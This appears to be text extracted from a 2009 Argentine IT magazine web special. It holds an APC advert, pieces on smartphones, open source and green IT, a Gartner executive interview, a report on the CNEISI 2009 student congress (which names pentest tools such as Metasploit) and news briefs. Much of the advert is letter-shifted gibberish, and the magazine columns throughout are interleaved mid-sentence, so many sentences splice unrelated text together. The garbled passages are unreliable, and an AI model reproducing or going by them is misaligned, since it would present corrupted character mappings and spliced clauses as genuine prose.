'LVSRQLEOH HQ WUHV WDPDร RV SDUD GLIHUHQWHV HQWRUQRV ,QIUD6WUX;XUH &HQWUDO Y OH EULQGD XQ QLYHO GH YLVLELOLGDG VLQ SUHFHGHQWHV GH OD FDSD GH LQIUDHVWUXFWXUD Iร VLFD GH VX FHQWUR GH GDWRV &XDQGR VH PRQLWRUHD WRGR HO HVWDEOHFLPLHQWR FRQ WDO DOFDQFH \ QLYHO GH GHWDOOH VH SXHGHQ ORJUDU ORV REMHWLYRV GH Hร FLHQFLD \ DGPLQLVWUDFLร Q GHVHDGRV FRQ IDFLOLGDG 'HVFRQHFWH VXV GLVSRVLWLYRV LQDFWLYRV HYLWH ODV FRQFHQWUDFLRQHV GH FDORU \ IDOODV HQ ORV HTXLSRV UHFXSHUH FDSDFLGDG LQPRYLOL]DGD \ FRQR]FD ODV GLร FXOWDGHV HQ PDWHULD GH VHJXULGDG DQWHV GH TXH VH FRQYLHUWDQ HQ XQ YHUGDGHUR SUREOHPD

Realice un seguimiento preciso de las propiedades de los dispositivos y de la ubicaciรณn fรญsica de los equipos

Conozca el impacto de los cambios antes de efectuarlos Controle entornos con diversas densidades dentro de la misma sala

Ver para creer.

(OLMD OD SHUVSHFWLYD ร QLFD \ FHQWUDOL]DGD GH ODV FRQGLFLRQHV DPELHQWDOHV GH DOLPHQWDFLร Q HQIULDPLHQWR \ VHJXULGDG TXH OH EULQGD ,QWUD6WUX;XUH &HQWUDO Y &XDQGR VH FRPELQD FRQ XQD DUTXLWHFWXUD ,QIUD6WUX;XUH VH SXHGH ORJUDU XQD VLPXODFLร Q FRQ YHUGDGHUD FDSDFLGDG SUHGLFWLYD GH WRGR HO FHQWUR GH GDWRV

APC tiene el orgullo de ser miembro de The Green Grid.

/RV VLJXLHQWHV SURGXFWRV KDQ VLGR SUREDGRV \ IXQFLRQDQ PHMRU FRQ ODV 6ROXFLRQHV ,QIUD6WUX;XUH 3DUD PยผV LQIRUPDFLร Q YLVLWH ZZZ [FRPSDWLEOH FRP

Regรญstrese hoy y obtenga nuestro tour online en Flash GRATUITO. Visite www.apc.com/promo H LQJUHVH HO FyGLJR G ย /ODPH DO 0800-222-3232

ย $PHULFDQ 3RZHU &RQYHUVLRQ &RUSRUDWLRQ $3& ,QIUDVWX;XUH 7$& 3HOFR 6TXDUH' VRQ SURSLHGDG GH 6FKQHLGHU (OHFWULF ,QGXVWULHV 6 $ 6 $PHULFDQ 3RZHU &RQYHUVLRQ &RUSRUDWLRQ R VXV HPSUHVDV DILOLDGDV /DV GHPยผV PDUFDV PHQFLRQDGDV VRQ SURSLHGDG GH VXV UHVSHFWLYDV FRPSDร ร DV s )DLUJURXQGV 5RDG :HVW .LQJVWRQ 5, 86$ s /RV GHWDOOHV FRPSOHWRV HVWยผQ GLVSRQLEOHV RQOLQH

/ NEX IT Especial Web /

95


General

Smartphones En medio de la compleja discusión desatada por el controvertido proyecto de Ley Nº 253 que busca aumentar los impuestos de los productos tecnológicos importados, los teléfonos inteligentes fueron señalados como “bienes suntuosos” por el gobierno.

presenta a un 4,5 por ciento del total de celulares del país. Esto demuestra que los smartphones ya no son una exclusividad o un bien que puede portar un empresario, sino que ahora están al alcance de la mayoría de los jóvenes de clase media.

Sin embargo, un estudio de la con- Redes Sociales sultora IDC realizado en marzo de La inscripción a las redes sociales 2009 demostró que más de medio como Facebook, Myspace, Twitter, millón de argentinos cuenta con un Linkedin, se disparó en este último smartphone en su bolsillo, lo que re- tiempo y cosechó miles de millones

96 / NEX IT Especial Web /


General

/ NEX IT Especial Web /

97


General de usuarios. Sin ir más lejos, Facebook y Myspa- Tercerización de los servicios Según los estudios de las consultoce ya instalaron sus propias oficinas ras más importantes del país como en nuestro país y sumaron más de (Sapphire Technologies, IDC) la Argenmedio millón de adeptos. A su vez, tina se consolidó como el país númeaparecen nuevos sitios día a día, un ro uno de Latinoamérica para recibir ejemplo de esto es Meme de Yahoo! proyectos de afuera (outsourcing). que ya lanzó su versión en español. “El país se destaca por su posición re-

Consolas Ultrasofisticadas

lativa en costos (por la devaluación),

La consola WII de Nintendo fue una estructura de comunicación, facilidad de las más comentadas este año. por la relación con los husos horaTambién lo fueron la PSP de Sony y la rios y la existencia de personal con XBox de Microsoft en sus diferentes un grado de capacitación importante. versiones. A su vez, Microsoft impac- Todo ello contribuye a formar la imató con Project Natal, una nueva forma gen de que es un destino viable para de controlar los videojuegos que pro- este tipo de servicios”, señala Alberto mete llevar la interacción a un nuevo Torrisi, gerente de Sapphire Technonivel, nunca antes visto.

98 / NEX IT Especial Web /

logies, primera empresa de recluta-


General

miento IT en nuestro país. Además los especialistas en recursos humanos aseguran que con la crisis esta tendencia se incrementó y vaticinan que para el año que viene el mercado seguirá con una gran demanda de personal.

Open Source

para que cada computadora lo utilice, se convirtió en la mejor solución. En este clima, muchas empresas decidieron migrar al sistema open source. Esto se reflejó en el aumento de los ingresos de firmas como Novell, que aumentó sus ventas el 24 por ciento en el último trimestre, o como Red Hat, que en lo que va del 2009

La crisis obligó a las personas a pen- incrementó sus ingresos un 18 por sar en alternativas como estas antes ciento. Oracle, IBM y más aún luego de gastar. Esto se vio reflejado tam- de la adquisición de Sun, también aubién en las oficinas donde la idea de mentaron sus ganancias. buscar un software por el que no tu- Según el estudio “2020 Flosss Roadviesen que pagar licencias anuales map” realizado en París a principios

/ NEX IT Especial Web /

99


General de este año, esta tendencia seguirá creciendo por diez años más y vaticinan que para 2020 el Open Source habrá dominado el mundo, lo que provocará que el 40 por ciento de los trabajos en el área de IT estén relacionados con lo libre. Open Source, asociado a la aparición de lo que se conoce como “cloud computing”, alcanzará una importancia nunca antes vista y acaparará el grueso del mercado laboral.

Green IT La inminente necesidad de adoptar medidas para preservar el medio am- no, entre otros temas urgentes. Sin ir biente hizo que la mayoría de las com- más lejos, en el CebIT, la feria europañías informáticas incluyeran tec- pea informática realizada en Alemanología verde en sus sistemas. Este nia en marzo de 2009, la Tecnología tipo de tecnología, que promueve el verde fue uno de los temas recurrenreciclado de materiales, el consumo tes en las conferencias dadas por los responsable y el ahorro de energía, expositores. sirve para contrarrestar los graves Por su parte, la empresa de servicios problemas que enfrenta hoy el plane- de auditoria francesa Deloitte Touche ta. La contaminación atmosférica con Tohmatsu realizó un estudio llamado emanaciones de gases (como el CO2 “La próxima ola de Tecnologías vertan usado por las PCS) que producen des” donde luego de encuestar a diel efecto invernadero, el cambio cli- ferentes ejecutivos del sector TI y fimático y el agujero en la capa de ozo- nanzas, determinaron cuáles fueron

100 / NEX IT Especial Web /

Foto: www.sxc.hu/ Flávio Takemoto

Este crecimiento desmesurado del


General las últimas medidas adoptadas por de trabajo, para apagarlos en el molas empresas y cuáles serán tenden- mento en el que están inactivos y así cia el próximo año.

controlar el consumo energético de

Por ejemplo, en el caso de Google, todos los dispositivos desplegados pusieron en marcha un proyecto con en una red IP, incluyendo teléfonos, “medidores especiales” instalados en computadoras y puntos de acceso. los electrodomésticos del hogar que Por último, Microsoft desarrolló una permitirá conocer cuánta electricidad nueva herramienta para su software consume cada uno. Por su parte, Cis- de gestión de recursos empresariales co Systems lanzó EnergyWise, un in- que permite a las organizaciones calnovador software que permite moni- cular la huella de carbono generada torear el consumo de energía de los en sus operaciones. dispositivos electrónicos en el lugar

/ NEX IT Especial Web /

101


General

La mujer que enseña la clave del Éxito

E

llen Kitzis es la Vicepre- del mercado informático, para luego sidenta de Gartner. Pero terminar dando clases de liderazgo también podría ser sim- y sinergia empresarial alrededor del plemente la Sra. Kitzis, mundo.

una de esas típicas maestras de co- Nos recibe en una de las salas de legio primario que hablan de manera conferencia del lujoso Hotel Hilton didáctica y cálida, y a la vez imponen para repasar su historia, nos cuenta respeto. Ellen es una mujer de esas cómo fue que llegó a ser especialista que saben plantarse frente a todos en estrategia organizacional y cómo con frescura y fuerza. Indudable- enseña a los jóvenes a ser feroces y mente, estas cualidades natas, de lí- visionarios líderes, aún en tiempos der, fueron las que lograron que por de crisis. También vaticina las proyeclos años 80, sin tener conocimiento ciones del sector para el futuro. alguno de la industria IT, consiguie- Años de experiencia ra volcarse al área de investigación Estar al frente de empresas como

102 / NEX IT Especial Web /


General Compaq, IDC y Gartner, haber escrito una experta con todas las letras. más de seis libros para académicos, Kitzis hace un repaso rápido por su trabajar con los más importantes lí- vida y recuerda que desde sus años deres de la industria de tecnología de en los que estaba en la universidad la información, así como con figuras estudiando la carrera de sociología de los gobiernos de todo el mundo soñaba con trabajar con profesionao simplemente haber pasado 22 años les de la industria IT, en el área orgade su vida al frente del sector, fue- nizacional, de mercado. Sus estudios ron algunas de las experiencias que de socióloga la ayudaron a convertirtransformaron a la Sra. Ellen Kitzis en se en una experta de los cambios de

La mujer detrás de los líderes En la actualidad, Ellen Kitzis es la vicepresidenta de Investigación en Gartner, pero su carrera en el ámbito de la tecnología empezó hace más de dos décadas. A mediados de los 80, con el Doctorado completo en cambio organizacional de la Universidad de Tufts y una satisfactoria carrera de Socióloga en su haber, la convocaron para trabajar en metodología de investigación del sector IT para la consultora IDC. Sin conocimientos previos en el sector, pero con algunas nociones básicas de los servicios de software y hardware y gracias a su experiencia en el campo organizacional, permaneció en ese puesto por 4 años, hasta que la llamaron por primera vez de su actual compañía Gartner-Dataquest para ocupar el puesto de Jefa a nivel mundial de los servicios IT. Siete años más tarde, le ofrecieron ser vicepresidenta de estrategia y desarrollo empresa-

rial y se fue a Compaq (ahora parte de HP). Pero luego, decidió regresar a la parte de investigación Gartner, para ser la jefa de CIOs. Durante casi cinco años formó parte del equipo de liderazgo global de los programas ejecutivos para CIO’s de Gartner. Asimismo, dirigió el equipo de expertos para América, trabajando diariamente para apoyar a CIOS y a otros líderes de la IT. Les enseñó a los jóvenes a involucrar algunos temas de la vida cotidiana en el liderazgo y otros tips de gestión de organizaciones de sistema de información. Este trabajo fue quizás el que la impulsó en el año 2005 a escribir el libro “El nuevo líder CIO: construyendo la agenda y brindando resultados”, que tuvo una gran repercusión en la industria. Actualmente se especializa en investigaciones para líderes IT, cambio organizacional, estrategias de gestión de la IT. Realiza viajes por todo Estados Unidos y América Latina y habla con grupos de CIO s sobre temas de actualidad. Además de su cargo gerencial, es vocera mundial de Gartner.

/ NEX IT Especial Web /

103


General la industria y conocer cómo pararse porque muchos líderes tradicionales frente a ella.

piensan sólo en términos de seguri-

¿Qué hay que tener para ser

dad, y previsibilidad, cuando lo im-

un gran Líder?

portante es entender el riesgo para

Según la especialista las cualidades tomarlo y saber llevarlo. que debe poseer un gran líder son También destaca que “es esencial varias. En principio debe tener Visión, mantener el espíritu de ganador aún Previsibilidad, Iniciativa, Capacidad en tiempos en los que nadie lo tiene”. de Comunicación, Seguidores y por Luego, se refiere a la teoría del vaso su puesto Talento.

medio lleno y medio vacío para expli-

En primer lugar, Kitzis señala que los car la postura de un líder positivo y la grandes líderes “tienden a tener una de un líder negativo. El primero sevisión y perspectiva de cómo se pue- ría aquel que sabe que en tiempos de de agregar valor al negocio; y de ver crisis quizás convenga frenar, analizar dónde están las oportunidades de in- dónde está parado, para que una vez novación que la organización no está recuperado podamos avanzar, mienaprovechando” por falta de informa- tras que los segundos, los líderes que ción. Saben también cómo pueden ven el vaso medio vacío, solo ven la reactivar el negocio.

imposibilidad y la dificultad que pro-

Pero un líder no sería tal sin inicia- pone la crisis. tiva y sin contar con la ductilidad e “Esta es la oportunidad (el momenimaginación suficiente para saber to de crisis) para entender el modelo cómo tomar riesgos equilibrando de negocio y construir un modelo relos resultados. Kitzis explica que los flexivo de financiación, en la que se grandes líderes entienden dónde la pueda invertir de diferentes maneras, empresa generará ganancias altas y utilizando diferentes vehículos no dónde están los riesgos, por lo que solo con tecnología”. comprenden cuándo es beneficioso De acuerdo con Ellen Kitzis, los granarriesgarse y cuándo no. Esto es muy des líderes tienen habilidad de comimportante, señala la especialista, prometerse con el equipo de líderes 104 / NEX IT Especial Web /


General ejecutivos de sus socios en un estilo y una misión”, advierte Kitzis. de comunicación de igual a igual, “los Los grandes líderes, en su experiengrandes líderes son buenos presen- cia, tienen la capacidad y habilidad no tándose no como gente técnica, sino solamente de elegir entre el talento, como aliados confiables”. Esta habili- sino para identificarlo donde sea que dad de comunicarse efectivamente a aparezca en la organización: “Los que ese nivel mejora su credibilidad y lo son grandes líderes tienen la habiliconvierte en un mejor líder”.

dad de identificar el talento dentro de

Por lo general este tipo de personas su propia empresa”. Y es de esta matiene un estilo digno de imitación, la nera como crean organizaciones con gente los quiere seguir. “Sin seguido- bases más fuertes, que pueden utilires no se puede ser un líder, y a su zar al amplio espectro del talento en vez éste tiene que tener un propósito su organización para ser exitosos.

/ NEX IT Especial Web /

105


General

Silvana M. Armando UTN FRSFCO

CNEISI 2009

UTN Facultad Regional San Francisco

L

os días 10, 11 y 12 de Junio Luego de muchos meses de trabase realizó en la UTN Facul- jo de la Comisión Organizadora del tad Regional de la ciudad evento, y gracias al éxito de sus gesde San Francisco, provin- tiones, logramos traer a más de 20 di-

cia de Córdoba, la tercera edición del sertantes profesionales de diferentes Congreso Nacional de Estudiantes de áreas dentro del campo de las TICs, Ingeniería en Sistemas de Informa- de empresas altamente reconocidas ción “CNEISI 2009”. Contamos con la como Google, Microsoft, Intel, Moparticipación de 500 alumnos, docen- torola, Harriague + Asociados, MUG, tes y graduados de facultades regio- Linked Comunicaciones, Asegurarte, nales pertenecientes a Resistencia, ESET, Fedora, NextIT, EDS, Vates, enReconquista, Villa María, Tucumán, tre otras. Mendoza, Delta, Rosario, Córdoba, Buenos Aires, La Plata, Concepción Cada una de estas empresas, además del Uruguay, Santa Fe, de nuestra fa- de patrocinar el evento, ha dispuesto cultad y de otras instituciones.

106 / NEX IT Especial Web /

un nivel altamente calificado de pro-


General

Federico Nan y Emiliano Piscitelli (IN) Seguridad con Herramientas Open Source

fesionales quienes disertaron acerca Además hubo talleres y seminarios de temas como soporte de sistemas, prácticos en laboratorios de compugerenciamiento de proyectos y ries- tación, presentación y evaluación de gos, presentación del sistema ope- papers y galería de posters, espacios rativo Linux- Fedora, seguridad con de vinculación entre las empresas y herramientas GNU, arquitectura para los futuros profesionales, y todo con desarrollo Mobile, certificación de un muy alto nivel de recursos humaclusters para cómputos de altas pres- nos trabajando de manera conjunta y taciones, computación en la nube, la organizada en cada uno de los ejes plataforma de desarrollo de Google, del evento. Microsoft OSLO, seguridad en el comercio electrónico, políticas, térmi- Algunas de las charlas se desarrollanos y condiciones de Internet - aná- ron simultáneamente en distintas salisis práctico de Facebook y Google, las de nuestra Facultad Regional San GNU/ Linux 2009 mitos y leyendas, Francisco: en el salón de actos cenentre otras.

tral, otras en los laboratorios y varias / NEX IT Especial Web /

107


General en las nuevas instalaciones del Área tipo dentro del campo de la Ingeniería de Posgrados. Además, se presentó en Sistemas de Información con los el “Museo de la Informática”, ideado participantes del Congreso, logrando y armado por docentes y alumnos de un exitoso intercambio social, cultunuestra facultad, en donde se pudie- ral y académico con los estudiantes y ron apreciar algunas presentaciones.

con los profesionales; promoviendo la educación, la investigación, el de-

Cabe recordar que la primera edición sarrollo y la creatividad para resaltar del CNEISI se había realizado en la nuestras habilidades académicas y UTN Facultad Regional Córdoba en humanas dentro del campo de la inel 2007 y al año siguiente se realizó formática. en la UTN Facultad Regional La Plata. Por lo tanto fue muy difícil enfrentar Cabe aclarar que este tipo de acontela dura misión de igualar y/o supe- cimientos se realizan también en berar las expectativas después de tan neficio de la comunidad en general, exitosos eventos. Además, fue la pri- no sólo de la tecnológica, favorecienmera vez que se hacía un evento de do la continuidad de estas actividades tales circunstancias en una ciudad no que ayudan a incrementar la eficacia capital de provincia, con la responsa- y la calidad de la educación impartida bilidad que ello implica.

hacia nosotros, los estudiantes. Finalmente,

queremos

felicitar

y

Debemos destacar que muchas fue- agradecer a la Universidad Tecnológiron las empresas que auspiciaron el ca Nacional - Facultad Regional San evento y ayudaron a que fuera posi- Francisco en su conjunto, al Comité ble, entre ellas, la Municipalidad de la Honorario formado por el Sr. Rector ciudad de San Francisco y la Comuni- de la Universidad Tecnológica Naciodad Tecnológica en su conjunto.

nal y por nuestro Decano que permitieron la realización de este evento; al

De esta manera pudimos compartir Comité Académico de la UTN y princiconocimientos y experiencias de todo palmente al Comité Organizador que 108 / NEX IT Especial Web /


General

suscripciones@revistanex.com - www.revistanex.com + 54 (11) 5021 2287/88 - Lavalle 348 Piso 6 - C1043AAF - Capital Federal - Argentina

/ NEX IT Especial Web /

109


General lograron que nuestra facultad tenga trascendencia nacional y que los que participaron del CNEISI 2009 se hayan retirado orgullosos de haber podido intercambiar experiencias y conocimientos para enfrentar y/o seguir su carrera profesional y recuerden este evento, no sólo como un éxito, sino también como una oportunidad de crecer y proyectarse en un futuro donde nuestra carrera cada vez cobra más importancia.

Resumen de algunas charas Computación en la nube, la plataforma de Desarrollo de Google Disertante: Alejandro Villanueva Developer Relations Lead Latin America - Google Fue una de las charlas más esperadas del evento. En esta exposición se abordó, desde el punto de vista de Google, la evolución de la plataforma Web y su impacto en los desarrolladores y el nuevo modelo de desarrollo Web. La importancia de la evolución de los browsers y las apis abiertas para desarrollos y el estándar HTML5. Google Code y la evolución del código abierto para la innovación de apis y desarrollos. La nueva tendencia de aplicaciones Web a través del navegador, con evolución de animaciones, videos, mapas iterativos, etc., mediante tags de código abierto, transparente y sencillo disponibles en el nuevo estándar de HTML5 y compatible con los principales browsers.

110 / NEX IT Especial Web /


General

(IN) Seguridad con Herramientas Open Source

Disertantes: Federico Nan y Emiliano PiscitelliRevista NEX IT - CentralTECH La charla fue dirigida al público en general, con el objetivo de informar sobre temas poco difundidos en el ámbito de la tecnología y la seguridad informática. Para comenzar se expuso una breve reseña de la teoría de la seguridad informática, especialmente basada en los cursos oficiales que se dictan en CISSP y CEH. Por otro lado, se presentaron herramientas de código abierto para realizar test de intrusión, las aplicaciones que se presentaron fueron Ettereal, Metasploit

y Evilgrade. Se expuso en vivo cómo usar algunas de estas herramientas y los ejemplos de cómo hackear un servidor fue lo más valorado por el público presente. Como así también, el uso de vocabulario y estilo informal de los dos disertantes fueron las características que hicieron que la charla, además de informativa, fuera muy divertida.

Variabilidad en el desarrollo de Software Familia de Productos Disertante: Ing. Nicolás BortolottiDocente Investigador- U.T.N. Regional San Francisco En esta charla se habló acerca del desarrollo de soluciones para familias de producto, el cual posee características esenciales que se tienen que contemplar en cualquier desarrollo y donde teniendo en cuenta el mercado actual, se propone reducir los tiempos de desarrollo y mejorar la calidad, desarrollando el principio de reusabilidad y afrontando grandes retos para que sean totalmente aceptados por la industria del software. Uno de los retos más importantes es el modelado de la variabilidad dentro del marco de desarrollo.

/ NEX IT Especial Web /

111


General

Derecho de privacidad en las empresas, ¿me pueden controlar el mail?

?

Disertante: Marcelo G. Temperini ESR Cisco Certified (Analista de Seg. y Vulnerabilidad en Redes) - AsegurarTe

?

En esta charla se dialogó acerca de la potestad de control de monitoreo y acceso por parte del empleador a las comunicaciones electrónicas de sus empleados, que debe ser ejercido de manera informada, consentida y razonable. Se vinculó con el ámbito laboral, donde los límites a la privacidad se vuelven difusos, generando inseguridad jurídica en las empresas y consecuencias graves en responsabilidad civil y penal. De esta manera se expuso cómo las políticas de privacidad son necesarias para determinar el correcto uso de los recursos corporativos de las empresas.

Seguridad en el Comercio Electrónico Disertante: Matías Adés Futuro Ing. U.T.N. Regional San Francisco En esta charla se introdujo al espectador a lo que es el Comercio Electrónico, brindando ciertos conceptos claves para que logre entender de qué se trata, y luego, como foco principal, se dieron recomendaciones desde el punto de vista de la seguridad al momento de navegar por Internet con el objetivo de comprar.

112 / NEX IT Especial Web /


General

/ NEX IT Especial Web /

113


General

Breves Números rojos para Microsoft

IDC: La industria IT con los números en rojo

Microsoft acaba de registrar la peor recaudación fiscal anual en su historia, con ingresos que bajan a un ritmo del 3 por ciento anual. Esta situación afectó a los empresarios de Redmond, que recibieron compensaciones menores que el año anterior.

Google invita a los usuarios a subirse a la ola

Google anunció que enviará 100.000 invitaciones a usuarios elegidos en todo el mundo para que prueben Google Wave, la nueva herramienta del gigante que promete mejorar las comunicaciones entre los usuarios. La nueva plataforma de Google que integra Chat, con correo electrónico, redes sociales entre otras facilidades, fue lanzada en mayo de este año pero será oficialmente a fin de año. La idea de esta convocatoria es que los usuarios prueben la estabilidad y velocidad de operación del servicio, para que cuando sea lanzado, se pueda abrir el sistema a todos los usuarios. No en vano, la mayoría de las invitaciones fueron destinadas a programadores. 114 / NEX IT Especial Web /

Los mercados de Hardware y Servicios decrecieron en más del 10 por ciento en el 2009 mientras el del Software cayó un 2 por ciento, según la consultora IDC. El menor decrecimiento en el área Software se debe a que se trata de un mercado más pequeño, que se vio reducido por la explosión de la piratería. En cuanto al futuro, IDC vaticina un afortunado porvenir para el 2010, cuando espera que las empresas de Latinoamérica aumenten su nivel de inversión gracias a la estabilidad y la tendencia positiva que esperan del mercado para el año próximo.


General

/ NEX IT Especial Web /

115


programaci贸n

116 / NEX IT Especial Web /


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.